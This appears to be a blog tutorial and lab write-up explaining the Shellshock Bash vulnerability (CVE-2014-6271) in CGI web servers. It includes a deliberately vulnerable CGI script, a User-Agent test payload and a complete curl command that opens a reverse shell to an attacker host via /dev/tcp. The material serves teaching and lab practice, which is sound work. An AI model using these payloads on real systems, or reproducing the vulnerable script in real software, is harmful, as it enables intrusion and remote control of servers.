Shellshock — A deep dive into CVE-2014–6271

I created a lab to demonstrate this vulnerability

Source: Photo by BittenTech on Youtube

What is Shellshock?

Shellshock is a critical vulnerability discovered in 2014 affecting the GNU/Bash shell. It allowed attackers to execute code remotely on the vulnerable Apache web server. The flaw is particularly dangerous when exploited through Apache web servers running CGI scripts, enabling remote code execution.

Shellshock is a vulnerability that exploits a malformed Bash function definition in the form of:

() { :; }; <payload>

This payload is passed to Bash via an environment variable when interacting with a vulnerable CGI script. When the CGI script invokes Bash, it incorrectly processes the function definition and executes any commands following it, treating them as part of the function call.

User-Agent: () { :; }; /bin/bash -c 'echo Vulnerable!'

Output: Vulnerable

Who is affected?

Windows systems are not affected. The vulnerability primarily impacts Linux and Unix-based systems running Bash ≤ 4.2, especially those using Apache with CGI scripts that invoke Bash.

CGI Scripts

Common Gateway Interface (CGI) is a script mostly written in languages like Perl, Python, Bash, and C. These scripts process user requests and return dynamic content to the client.

Source: Photo on Memorial University

How CGI Handles Data

CGI scripts rely on environment variables in Linux to store and process request data, including HTTP headers, query parameters, and form inputs. When a web server receives an HTTP request, it:

1. Extracts request data (headers, parameters). Eg: User-Agent
2. Stores it in environment variables (e.g., HTTP_USER_AGENT, QUERY_STRING).
3. Passes them to the CGI script, which processes them and returns a response.

Example CGI Script

Source: Photo on INE article

In the above image, the user’s browser information (User-Agent) is displayed on the web application. This is achieved using a CGI script, similar to the one below. The script retrieves the User-Agent string from the environment variable $HTTP_USER_AGENT and prints it as part of the response.

#!/bin/bash
echo "Content-type: text/plain"
echo
echo "Processing your request..."
echo "User-Agent: $HTTP_USER_AGENT"

Bash functions

Bash functions are similar to functions in other programming languages. Below is a simple example:

my_function() {
  echo "Hello from Bash!"
}
my_function  # Calling the function

Then why Shellshock possible only in Bash? The difference lies in how Bash parses functions.

The Malformed Function () { :;};

This payload takes advantage of a parsing flaw in Bash’s function declaration mechanism. Let’s break it down:

() { :;};

() — This should normally define a function, but there is no function name given.

{ :; } — This is the function body.

: — is a built-in Bash command that does nothing (a NOP).

; — ends the command.

; — Ends the function definition but allows additional commands to follow.

Vulnerable Code

Below is a CGI script that is vulnerable to Shellshock:

#!/bin/bash
echo "Content-type: text/plain"
echo
echo "Processing your request..."
echo "User-Agent: $HTTP_USER_AGENT"
bash -c "$HTTP_USER_AGENT"  # Vulnerability here

Why is it Vulnerable?

• The script directly executes the HTTP_USER_AGENT environment variable without input validation.

The Workflow

Created with Napkin AI

1. Malicious Bash function is injected into the User-Agent HTTP header:
2. The web server (Apache with mod_cgi enabled) stores the User-Agent header as an environment variable.
3. A vulnerable CGI script retrieves the User-Agent environment variable and prints it.
4. The script executes Bash, unknowingly passing the malicious function definition.
5. Bash incorrectly parses the function definition and executes everything after it, treating it as part of the function call.
6. The malicious payload runs, giving the attacker control over the system.

Exploitation

I made a vulnerable lab for this demonstration. Let’s boot our VM and visit the vulnerable site.

1. Let’s fill up this form and capture the request.

2. To find if the site is vulnerable, We can use a nmap script called ‘http-shellshock’ which would do most of the work for you. Read about this here.

3. We are going to use a basic payload to find if the site is vulnerable.

4. Let’s remove the ‘Accept-Encoding’ header to decode the response.

5. We can also use curl to make this happen.

6. Let’s try to take Reverse shell on this web server.

Payload: reverse shell

curl -A "() { :;}; /bin/bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1" http://<victim-ip>/cgi-bin/vuln.sh

Reverse Shell listener

Please Refer this article to learn about mitigation.

P.S. Please comment down if you want to learn how to create this vulnerable lab and try this exercise on your own

Thanks for Reading. Happy hacking!!

References:

1. https://www.exploit-db.com/docs/english/48112-the-shellshock-attack-%5Bpaper%5D.pdf
2. https://www.geeksforgeeks.org/common-gateway-interface-cgi/
3. https://ine.com/blog/shockin-shells-shellshock-cve-2014-6271
4. https://www.crowdstrike.com/en-us/blog/mitigating-bash-shellshock/